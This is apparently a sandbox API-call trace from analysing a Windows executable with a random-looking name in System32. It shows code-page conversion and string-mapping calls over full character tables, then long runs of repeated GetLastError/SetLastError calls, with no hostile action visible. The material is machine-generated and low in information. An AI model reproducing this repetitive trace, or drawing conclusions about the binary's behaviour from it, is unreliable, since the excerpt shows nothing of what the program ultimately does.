\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뉮矲狰Ā", cchSrc=256, lpDestStr=0x1cebf8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.886] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1cf3d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÉ{íõ\x0cö\x1c", lpUsedDefaultChar=0x0) returned 256 [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4d4, cbMultiByte=256, lpWideCharStr=0x1cee28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뉮矲狰Ā") returned 256 [0036.886] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뉮矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.886] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뉮矲狰Ā", cchSrc=256, lpDestStr=0x1cec18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.886] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1cf2d4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÉ{íõ\x0cö\x1c", lpUsedDefaultChar=0x0) returned 256 [0036.886] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.887] SetLastError (dwErrCode=0x0) [0036.887] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.888] SetLastError (dwErrCode=0x0) [0036.888] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.889] GetLastError () returned 0x0 [0036.889] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.890] SetLastError (dwErrCode=0x0) [0036.890] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.891] SetLastError (dwErrCode=0x0) [0036.891] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.892] SetLastError (dwErrCode=0x0) [0036.892] GetLastError () returned 0x0 [0036.893] SetLastError (dwErrCode=0x0) [0036.893] GetLastError () returned 0x0 [0036.893] SetLastError (dwErrCode=0x0) [0036.893] GetLastError () returned 0x0 [0036.893] SetLastError (dwErrCode=0x0) [0036.893] GetLastError () returned 0x0 [0036.893] SetLastError (dwErrCode=0x0) [0036.893] GetLastError () returned 0x0 [0036.893] SetLastError (dwErrCode=0x0) [0036.893] GetLastError () returned 0x0 [0036.893] SetLastError (dwErrCode=0x0) [0036.893] GetLastError () returned 0x0 [0036.912] SetLastError (dwErrCode=0x0) [0036.912] GetLastError () returned 0x0 [0036.912] SetLastError (dwErrCode=0x0) [0036.912] GetLastError () returned 0x0 [0036.912] SetLastError (dwErrCode=0x0) [0036.912] GetLastError () returned 0x0 [0036.912] SetLastError (dwErrCode=0x0) [0036.912] GetLastError () returned 0x0 [0036.912] SetLastError (dwErrCode=0x0) [0036.912] GetLastError () returned 0x0 [0036.912] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.913] SetLastError (dwErrCode=0x0) [0036.913] GetLastError () returned 0x0 [0036.914] SetLastError (dwErrCode=0x0) [0036.914] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.915] SetLastError (dwErrCode=0x0) [0036.915] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.916] SetLastError (dwErrCode=0x0) [0036.916] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.917] SetLastError (dwErrCode=0x0) [0036.917] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.918] SetLastError (dwErrCode=0x0) [0036.918] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] 